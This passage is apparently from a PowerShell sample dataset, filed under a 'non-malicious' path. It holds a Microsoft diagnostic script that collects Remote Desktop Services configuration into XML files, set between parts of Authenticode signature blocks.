# NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo
# DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3
# a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF
# HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy
# 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC
# Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj
# L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp
# h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3
# cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X
# dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL
# E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi
# u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1
# sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq
# 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb
# DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/
# V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIBNd88v60ME/cMf1rqdBP4T3
# 9yMm5kc3mIDQApOzrnFZMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEASIcmXCBALoNe/avgvwl2HpthBc/SiY8m/rzqXEwEKwAzl54H99ciSlHc
# +uwBQSFy9SbgdkckDCehiupMXdREIZemJkQ2pACuJGAlU37QYrEbxFYkl/a+OCR0
# w+zy3LwLziDvB+C7MbA2TwMW1e2YwezpUK3GlZbAgiASaXMhrNsc3OHnY67poo5j
# 6eR3/j1PewX7gvoOxEqYJ1UZr7OUCuxkUNYYD0GbXuzusSvAEQ0/fQ7b9tBqygbb
# 5zQSDL8hMo1fvHgXwesVgHUKo8RYUbl/oGAP63rjmnXrx+gyjxOkqjI7lkMuFBVg
# gxWyVOItt744aIaR1aZQ+TvyPhT6eKGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC
# F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq
# hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCBnNvz1I03TtFMida7uuSAHili1HQ3ZndrM6c6/HpjUFgIGZwgPwXMg
# GBMyMDI0MTAxNjE4MzM1MS42ODdaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RTAwMi0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg
# ghHqMIIHIDCCBQigAwIBAgITMwAAAe4F0wIwspqdpwABAAAB7jANBgkqhkiG9w0B
# AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1
# NDRaFw0yNTAzMDUxODQ1NDRaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z
# MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RTAwMi0wNUUwLUQ5NDcxJTAjBgNV
# BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQC+8byl16KEia8xKS4vVL7REOOR7LzYCLXEtWgeqyOV
# lrzuEz+AoCa4tBGESjbHTXECeMOwP9TPeKaKalfTU5XSGjpJhpGx59fxMJoTYWPz
# zD0O2RAlyBmOBBmiLDXRDQJL1RtuAjvCiLulVQeiPI8V7+HhTR391TbC1beSxwXf
# dKJqY1onjDawqDJAmtwsA/gmqXgHwF9fZWcwKSuXiZBTbU5fcm3bhhlRNw5d04Ld
# 15ZWzVl/VDp/iRerGo2Is/0Wwn/a3eGOdHrvfwIbfk6lVqwbNQE11Oedn2uvRjKW
# EwerXL70OuDZ8vLzxry0yEdvQ8ky+Vfq8mfEXS907Y7rN/HYX6cCsC2soyXG3OwC
# tLA7o0/+kKJZuOrD5HUrSz3kfqgDlmWy67z8ZZPjkiDC1dYW1jN77t5iSl5Wp1HK
# Bp7JU8RiRI+vY2i1cb5X2REkw3WrNW/jbofXEs9t4bgd+yU8sgKn9MtVnQ65s6QG
# 72M/yaUZG2HMI31tm9mooH29vPBO9jDMOIu0LwzUTkIWflgd/vEWfTNcPWEQj7fs
# WuSoVuJ3uBqwNmRSpmQDzSfMaIzuys0pvV1jFWqtqwwCcaY/WXsb/axkxB/zCTdH
# SBUJ8Tm3i4PM9skiunXY+cSqH58jWkpHbbLA3Ofss7e+JbMjKmTdcjmSkb5oN8qU
# 1wIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFBCIzT8a2dwgnr37xd+2v1/cdqYIMB8G
# A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG
# Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy
# MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w
# XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy
# dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG
# A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD
# AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB3ZyAva2EKOWSVpBnYkzX8f8GZjaOs577F
# 9o14Anh9lKy6tS34wXoPXEyQp1v1iI7rJzZVG7rpUznay2n9csfn3p6y7kYkHqtS
# ugCGmTiiBkwhFfSByKPI08MklgvJvKTZb673yGfpFwPjQwZeI6EPj/OAtpYkT7IU
# XqMki1CRMJKgeY4wURCccIujdWRkoVv4J3q/87KE0qPQmAR9fqMNxjI3ZClVxA4w
# iM3tNVlRbF9SgpOnjVo3P/I5p8Jd41hNSVCx/8j3qM7aLSKtDzOEUNs+ZtjhznmZ
# gUd7/AWHDhwBHdL57TI9h7niZkfOZOXncYsKxG4gryTshU6G6sAYpbqdME/+/g1u
# er7VGIHUtLq3W0Anm8lAfS9PqthskZt54JF28CHdsFq/7XVBtFlxL/KgcQylJNni
# a+anixUG60yUDt3FMGSJI34xG9NHsz3BpqSWueGtJhQ5ZN0K8ju0vNVgF+Dv05si
# rPg0ftSKf9FVECp93o8ogF48jh8CT/B32lz1D6Truk4Ezcw7E1OhtOMf7DHgPMWf
# 6WOdYnf+HaSJx7ZTXCJsW5oOkM0sLitxBpSpGcj2YjnNznCpsEPZat0h+6d7ulRa
# WR5RHAUyFFQ9jRa7KWaNGdELTs+nHSlYjYeQpK5QSXjigdKlLQPBlX+9zOoGAJho
# Zfrpjq4nQDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI
# hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy
# MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
# AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg
# M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF
# dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6
# GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp
# Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu
# yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E
# XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0
# lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
# GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ
# +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA
# PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw
# EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG
# NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV
# MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK
# BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC
# AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX
# zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v
# cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
# KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG
# 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x
# M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC
# VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449
# xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM
# nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS
# PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d
# Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn
# GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs
# QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
# jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL
# 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN
# MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn
# MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkUwMDItMDVFMC1EOTQ3MSUwIwYDVQQD
# ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCI
# o6bVNvflFxbUWCDQ3YYKy6O+k6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6rp2vDAiGA8yMDI0MTAxNjE3MzAz
# NloYDzIwMjQxMDE3MTczMDM2WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDquna8
# AgEAMAcCAQACAicWMAcCAQACAhMGMAoCBQDqu8g8AgEAMDYGCisGAQQBhFkKBAIx
# KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI
# hvcNAQELBQADggEBAAVODDMIZ6W2LPrkcEVt4Fzx/uEMxixhKMk+TzR4DmevZU9P
# qJmx+ZYxe5PxCHixXZz+MMehuI7GtC70yIzMD12oSxDBG7KJdCOFcJYGAuTXJxSP
# Un7kqbPd4d6UFV8+W+jCmtv+vsUsv9XMVmGwllGAYnb0S9nM5vWLpSaBX5Avtx0H
# KUz0dtY5Ll6HLhHcWm9B/KdrQZ/Fq5qGmCTbNC3Z2/Y1oqiwes2O9GYmv1tA5Mh3
# K4Oe6JBDefJ/al+vhwvpe5O5NMZpEQnK7QTG2th6QAcIhLddE0F+SvwhNuU5h82A
# u4x5reHvL1x605CMOLv25rTmOe1fPYn7YHPQbF8xggQNMIIECQIBATCBkzB8MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy
# b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAe4F0wIwspqdpwABAAAB7jAN
# BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G
# CSqGSIb3DQEJBDEiBCCdoCRYEPp2fukg5NU8eZe+aIqJZsAGM7iLu1RZw3ktdTCB
# +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIE9QdxSVhfq+Vdf+DPs+5EIkBz9o
# CS/OQflHkVRhfjAhMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh
# c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
# b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
# MTACEzMAAAHuBdMCMLKanacAAQAAAe4wIgQgypNBqG7fU7A7VCn6X/tdhEQ2o++X
# iJP/DubAOv0bKlowDQYJKoZIhvcNAQELBQAEggIAC2cfokrNap01jfg16dACmrgJ
# +YR0/0NxlMndAQE3o0ZN4p60dRgy0ya52UYXBNL44oggBocaL+dXpCJCve5pbFOb
# 4jlaZJObfXX5WWGavKZNT2Ph9j7Wk8YEClsdgVYo6M9nhpRS2FOlaqAn+uecgIrH
# IUIUnPBitDm1lyAG/hI5oPOlvJDx6yiUBCWojnxUMTgP6iiDdXFuRwQt54pAp0lI
# 3NxW22bS/ghe9gHPLg6uiQAgXzs0JtS1z8WRD7Uj7WxZcC6z/g9wOXrflz1en0cO
# XRn4gSwF1NgF4SvzuQl+klk0Bc1TT3qZJRsO4Z767Rb8p0JuVdcFOkj6wqJSS2nf
# zge88MnvFVvs0YVGmenp8TzBRLFycwK1gEWoEkjqVZVsnYqNITj2nadvKq7Hizs8
# rLU4V4B3a3hJKBDbJKrDnlewt2SduUW3Brep//glC6Jp3exqruVynLgg71OgQqmk
# t1ZgCXUl/PVtDUP7v5CLhMAYWXypht3ohd1krB+MFUF70ZQtVgo1xevLrDplx8i3
# ag/7pEOjf7v/terHpuYAkztjFWQorW2rV9LQIXGUiGX93+P5dJTzc7BvYCdWuUum
# er6F2QxhGAsnF3agi15K2dvLJMBuGVByQ1d8DZm1oz5D45zDxYhyTt/TO611L6ji
# Q0rEbJRw9qT6QrSYxcg=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_3_9.ps1
|
sample_3_9.ps1
|
#************************************************
# DC_RDSPowerInfo.ps1
# Version 1.0.1
# Date: 21-01-2012
# Author: Daniel Grund - dgrund@microsoft.com
# Description:
# This script gets the RDP config and
# checks vital signs to inform user.
# 1.0.0 Beta release
#************************************************
PARAM(
$TargetHost,
$OutputFileName,
$RDSSDPStrings
)
# globals and function definitions for RDS
Import-LocalizedData -BindingVariable RDSSDPStrings
# Everything in Try catch because import-module might fail
try{
import-module RemoteDesktopServices
$RDS = get-childitem RDS:
$RDS | foreach-object{
Write-DiagProgress -Activity $RDSSDPStrings.ID_RDSServerProgress -Status ($RDSSDPStrings.ID_RDSPowerShell +" ("+ $_ + ")")
$Job = Start-Job -initializationScript {import-module RemoteDesktopServices} -scriptblock {try{get-childitem -recurse rds:\$_ }catch{ $Error.Clear() }}
#wait for max 3 minutes to complete
Wait-Job $Job -Timeout (3*60)
Stop-Job $Job
if ($job.HasMoreData -eq $true)
{
$config = Receive-Job $Job |select-object PSPath,Name,CurrentValue,PermissibleValues,Description,GroupPolicy
$xml = ConvertTo-Xml $config
$savepath = $TargetHost + "_" + $_.Name + "_Settings.xml"
[array]$OutputFileName += $savepath
$xml.Save($savepath)
}
Remove-Job $Job
}
}
catch {
$RCNum +=1
ReportError -RCNum $RCNum -RootCause $RDSSDPStrings.ID_RDSPowerShellError -Solution $RDSSDPStrings.ID_RDSPowerShellSolution
}
$Error.Clear()
# SIG # Begin signature block
# MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDgIXTIC9IVsn0m
# Q8knckGTmbjn6eYN19caJ3hav61IwqCCDYUwggYDMIID66ADAgECAhMzAAAEA73V
# lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV
# LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY
# oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi
# kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/
# /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv
# ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
